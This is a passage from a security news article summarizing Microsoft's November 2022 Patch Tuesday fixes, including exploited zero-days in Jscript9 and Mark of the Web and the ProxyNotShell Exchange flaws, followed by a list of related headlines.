Microsoft separately fixed another actively exploited vulnerability, **CVE-2022-3723**. It was detected in Chromium-based browsers.

**Zero-Days Details**

Microsoft’s security response team described four new and already exploited zero-days tracked as **CVE-2022-41125**, **CVE-2022-41073**, **CVE-2022-41091**, and **CVE-2022-41128**.

The CVE-2022-41128 was detected by Google TAG’s Benoît Sevens and Clément Lecigne, found in the Jscript9 component. It occurred when the target was lured to visit a malicious website.

The CVE-2022-41091 is a security bypass flaw in Windows MoTW (Mark of the Web), which was recently discovered to be weaponized by the **Magniber ransomware** actor, and users were targeted with fake software updates. A malicious file could help the attacker evade MoTW defenses that lead to loss of integrity and security features like MS Office’s Protected View, **Microsoft’s advisory read**.

**Microsoft Exchange Server Vulnerabilities**

In addition, they also patched two Microsoft Exchange server flaws tracked as **CVE-2022-41040 and CVE-2022-41082**. These exploits were used for privilege escalation, RCE (remote code execution), and feature bypassing.

The first four flaws impacted the Windows CNG Key Isolation Service, the Windows Print Spooler, Windows Mark of the Web Security, and Windows Scripting Languages. The other two flaws that **affected Exchange Server** entailed an RCE, and a privilege escalation bug, which was actually part of an extended exploit chain that Microsoft believes was exploited by a state-sponsored threat actor.

According to Microsoft, due to security issues, at least ten organizations have been targeted. Both flaws are documented as SSRF (server-side request forgery) issues.

**Critical Vulnerabilities Fixed in November**

Other Critical-rated vulnerabilities were privilege escalation flaws discovered in Windows Kerberos RC4-HMAC (**CVE-2022-37966**), Kerberos (**CVE-2022-37967**), and Microsoft Exchange Server (**CVE-2022-41080**). Moreover, a denial-of-service flaw was also fixed that impacted Windows Hyper-V (**CVE-2022-38015**).

1.  **Chinese Hackers Hiding Malware in Windows Logo**
2.  **Hackers Abusing Microsoft Dynamics 365 Customer Voice**
3.  **Microsoft Office Most Exploited Software in Malware Attacks**
4.  **Apple Safari Safest, Google Chrome Riskiest Browser of 2022**
5.  **Scammers Leveraging Microsoft Team GIFs in Phishing Attacks**

Tag

#apple